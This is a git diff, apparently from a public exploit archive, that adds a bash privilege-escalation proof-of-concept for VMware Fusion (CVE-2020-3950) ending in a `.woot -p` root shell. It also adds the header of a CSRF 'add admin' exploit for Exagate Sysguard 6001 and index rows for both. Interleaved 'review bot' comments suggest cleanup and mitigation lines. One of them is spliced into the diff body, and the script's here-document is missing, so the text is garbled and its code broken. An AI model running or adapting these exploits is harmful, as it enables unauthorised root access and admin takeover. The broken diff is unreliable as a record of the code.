diff --git a/exploits/macos/local/48235.sh b/exploits/macos/local/48235.sh
new file mode 100755
index 000000000..c6a0f7f73
--- /dev/null
+++ b/exploits/macos/local/48235.sh
@@ -0,0 +1,43 @@
+# Exploit Title: VMware Fusion 11.5.2 - Privilege Escalation
+# Date: 2020-03-17
+# Exploit Author: Rich Mirch
+# Vendor Homepage: https://www.vmware.com/products/fusion.html
+# Vendor Advisory: https://www.vmware.com/security/advisories/VMSA-2020-0005.html
+# Software Link: https://download3.vmware.com/software/fusion/file/VMware-Fusion-11.5.1-15018442.dmg
+# Versions:
+# VMware Fusion Professional 11.5.1 (15018442)
+# VMware Fusion Professional 11.5.2 (15794494)
+#
+# Tested on: macOS 10.14.6
+# CVE : CVE-2020-3950
+# Source PoC: https://raw.githubusercontent.com/mirchr/security-research/master/vulnerabilities/CVE-2020-3950.sh
+#
+#
+#!/bin/bash
+echo "CVE-2020-3950 VMware Fusion EoP PoC by @0xm1rch"
+
+mkdir -p ~/a/b/c
+mkdir -p ~/Contents/Library/services
+
+cat > ~/Contents/Library/services/VMware\ USB\ Arbitrator\ Service </dev/null
+"${PWD}/Open VMware USB Arbitrator Service" >/dev/null 2>/dev/null &
+p=$!
+echo "Sleeping for 5 seconds"
+sleep 5
+kill ${p?}
+wait
+
+echo "Sleeping for 7 seconds"
+sleep 7
+
+$HOME/.woot -p
\ No newline at end of file
diff --git a/exploits/php/webapps/48234.txt b/exploits/php/webapps/48234.txt
new file mode 100644
index 000000000..8c9a73dce
--- /dev/null
+++ b/exploits/php/webapps/48234.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)
+# Exploit Author: Metin Yunus Kandemir
+# Vendor Homepage: https://www.exagate.com/
+# Software Link: https://www.exagate.com/sysguard-6001
+# Version: SYSGuard 6001
+
+HTML CSRF PoC :
+
+
+
+
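Review bot: In exploits/macos/local/48235.sh the script creates `~/a/b/c`, `~/Contents/Library/services/VMware\ USB\ Arbitrator\ Service` and `$HOME/.woot` and never removes them, and the header does not list them, so a lab tester has no cleanup checklist and a defender has no indicator list. I would add a header comment such as `# Artifacts left in $HOME: a/b/c, Contents/Library/services/, .woot (remove after testing)` and a line naming the fixed release from VMSA-2020-0005. If `.woot` is a setuid-root shell, as the `-p` flag suggests, a setuid file appearing under a user's home directory is also the simplest thing to alert on. `#!/bin/bash` is the sixteenth added line, below the comment header, where it is only a comment; it belongs on line 1. The here-document body after `cat >` is not visible on this page, so the content written to the service file is unreviewed.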
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 816dfdb88..19b8c416e 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10994,6 +10994,7 @@ id,file,description,date,author,type,platform,port
 48227,exploits/windows/local/48227.txt,"NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path",2020-03-18,"El Masas",local,windows,
 48231,exploits/multiple/local/48231.md,"Microsoft VSCode Python Extension - Code Execution",2020-03-17,Doyensec,local,multiple,
 48232,exploits/macos/local/48232.md,"VMWare Fusion - Local Privilege Escalation",2020-03-17,Grimm,local,macos,
+48235,exploits/macos/local/48235.sh,"VMware Fusion 11.5.2 - Privilege Escalation",2020-03-20,"Rich Mirch",local,macos,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42484,3 +42485,4 @@ id,file,description,date,author,type,platform,port
 48220,exploits/php/webapps/48220.py,"PHPKB Multi-Language 9 - Authenticated Directory Traversal",2020-03-16,"Antonio Cannito",webapps,php,
 48221,exploits/php/webapps/48221.py,"PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution",2020-03-16,"Antonio Cannito",webapps,php,
 48225,exploits/hardware/webapps/48225.txt,"Netlink GPON Router 1.0.11 - Remote Code Execution",2020-03-18,shellord,webapps,hardware,
+48234,exploits/php/webapps/48234.txt,"Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)",2020-03-20,"Metin Yunus Kandemir",webapps,php,
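Review bot: The header of exploits/php/webapps/48234.txt has no `# Date:` or `# Tested on:` line, unlike the 48235.sh entry in the same commit; the index row added to files_exploits.csv records 2020-03-20, so `# Date: 2020-03-20` would keep the two in step. A one-line remediation pointer would also help readers who administer the device, for example `# Mitigation: require a per-request anti-CSRF token on the add-admin form`. The form markup under `HTML CSRF PoC :` is not visible on this page and is not reviewed here.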